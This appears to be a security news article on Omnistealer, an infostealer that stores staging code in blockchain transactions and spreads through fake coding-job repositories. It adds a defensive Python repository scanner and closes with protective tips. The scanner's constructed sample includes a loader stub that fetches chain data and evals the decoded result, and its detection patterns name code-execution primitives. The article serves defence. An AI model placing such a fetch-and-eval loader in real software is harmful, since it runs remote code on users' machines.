A new infostealer dubbed Omnistealer is turning the blockchain into a permanent malware hosting platform, which is bad news for both companies and everyday users.
It’s pretty common for malware to store its payload on a public platform, ideally one that adds some trustworthiness to the download location, like Google Docs, OneDrive, GitHub, npm, PyPI, and so on.
The problem for malware peddlers is that these can be taken down. It can sometimes take a while and a lot of trouble, but it’s possible. Omnistealer gets around this by storing its staging code inside transactions on public blockchains like TRON, Aptos, and Binance Smart Chain.
Some blockchain transactions allow small bits of arbitrary data (notes, metadata, smart contract inputs) and instead of something harmless, attackers insert:
- Encrypted text
- Encoded commands
- Pieces of malware code
And because blockchains are append‑only, those malicious snippets are effectively undeletable once they’re mined into a block. You can revoke domains and pull GitHub repos, but you can’t roll back TRON or BSC just to remove a few hundred bytes of malware staging code.
That turns public ledgers into a resilient, censorship‑resistant command-and-control infrastructure that defenders can’t simply take down.
Despite the obvious connection to cryptocurrency, Omnistealer is not solely about robbing crypto investors. Once Omnistealer lands on a system, it goes after:
- More than 10 password managers, including cloud‑synced consumer tools such as LastPass.
- Major browsers like Chrome and Firefox, scraping saved logins and session data.
- Cloud storage accounts, including Google Drive credentials.
- Over 60 browser‑based crypto wallets, including popular extensions like MetaMask and Coinbase Wallet.
It’s designed to be a one‑stop data vacuum that investigators say will “literally steal everything.”
The attack typically starts with a “simple” coding gig: a contractor gets a LinkedIn or Upwork offer, pulls a GitHub repository, and runs what looks like normal project code. Behind the scenes, that code reaches out to the blockchain, reads transaction data, and uses it as a pointer to fetch and decrypt the final payload.
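As an added example (not code from this article or from any Omnistealer analysis), here is a pre-run check a defender can apply to a freshly cloned “coding test” repository before touching `npm install`: it flags npm lifecycle hooks and source files that both reference a public chain RPC host and hand decoded data to a code-execution primitive. The hostnames and regexes are assumptions based on the public endpoints of the chains named above, and the sample repository it scans is constructed and inert.

```python
import json, re, tempfile
from pathlib import Path

# Assumption: well-known public RPC/explorer hosts for the chains the article
# names (TRON, Aptos, BSC); extend this watchlist for chains used in your org.
CHAIN_HOSTS = re.compile(r"trongrid\.io|tronscan\.org|aptoslabs\.com|bsc-dataseed|bscscan\.com", re.I)
# Primitives that turn fetched data into running code.
DYN_EXEC = re.compile(r"\b(eval|new Function|child_process|vm\.runInThisContext)\b")
# Decoding/decryption that typically sits between the chain read and execution.
DECODE = re.compile(r"['\"]hex['\"]|atob\(|createDecipheriv|base64")
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")
SOURCE_EXT = {".js", ".cjs", ".mjs", ".ts", ".py"}

def scan_source(text: str) -> set[str]:
    """Return which suspicious traits a single file exhibits."""
    checks = {"chain_rpc": CHAIN_HOSTS, "dynamic_exec": DYN_EXEC, "decode": DECODE}
    return {name for name, rx in checks.items() if rx.search(text)}

def scan_repo(root: Path) -> dict[str, list[str]]:
    """Flag npm lifecycle hooks and files that read a chain and execute the result."""
    findings: dict[str, list[str]] = {}
    pkg = root / "package.json"
    if pkg.is_file():
        scripts = json.loads(pkg.read_text()).get("scripts", {})
        hooks = [h for h in LIFECYCLE if h in scripts]
        if hooks:
            findings["package.json"] = [f"lifecycle_hook:{h}" for h in hooks]
    for path in root.rglob("*"):
        if path.suffix not in SOURCE_EXT or "node_modules" in path.parts:
            continue
        traits = scan_source(path.read_text(errors="ignore"))
        # A chain read alone is normal for a dapp; chain read plus decode/exec
        # is the staging pattern described above.
        if "chain_rpc" in traits and traits & {"dynamic_exec", "decode"}:
            findings[path.relative_to(root).as_posix()] = sorted(traits)
    return findings

def build_constructed_sample() -> Path:
    """Constructed, inert repo mimicking the lure: a postinstall hook plus a loader stub."""
    root = Path(tempfile.mkdtemp())
    (root / "package.json").write_text(json.dumps(
        {"name": "demo-task", "scripts": {"postinstall": "node lib/setup.js"}}))
    (root / "lib").mkdir()
    (root / "lib" / "setup.js").write_text(
        'const r = await fetch("https://api.trongrid.io/v1/transactions/PLACEHOLDER");\n'
        'eval(Buffer.from((await r.json()).data, "hex").toString());\n')
    (root / "lib" / "ui.js").write_text('console.log("renders the task form");\n')
    return root
```

Run `scan_repo(build_constructed_sample())` to see the hook and the loader stub flagged while the harmless UI file passes; a hit is a reason to read the file in a throwaway VM, not proof of malice.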
Researchers estimate that roughly 300,000 credentials have already been compromised, spanning everything from adult‑industry platforms and food delivery to financial compliance firms, defense suppliers, and US government entities.
You can’t delete malware from the blockchain, but you can make it much harder for campaigns like this to affect you. First, reduce what’s available to steal. Then protect your information better.
- Treat “dream job” and unsolicited contract offers as suspicious by default, especially if they move quickly to off‑platform chats (Telegram, Discord) or ask you to run code from a private repository.
- Lock down your passwords with a reputable password manager and turn on multi-factor authentication (preferring app or key over SMS) for any important or sensitive account.
- Use an up-to-date, real-time anti-malware solution to block, detect, and remove threats like Omnistealer.
- Don’t use your everyday user profile or main workstation as a test bench for random GitHub projects or side gigs. Use a virtual machine or separate system instead.
- Watch your crypto and banking accounts for unexplained logins or withdrawals, and move funds to new wallets if you suspect compromise.
